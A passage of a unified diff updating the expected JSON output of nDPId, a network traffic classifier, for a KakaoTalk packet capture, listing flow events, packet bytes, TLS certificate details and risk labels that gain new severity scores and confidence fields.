{"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
+01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00796{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="}
@@ -184,54 +184,54 @@
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00662{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00662{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
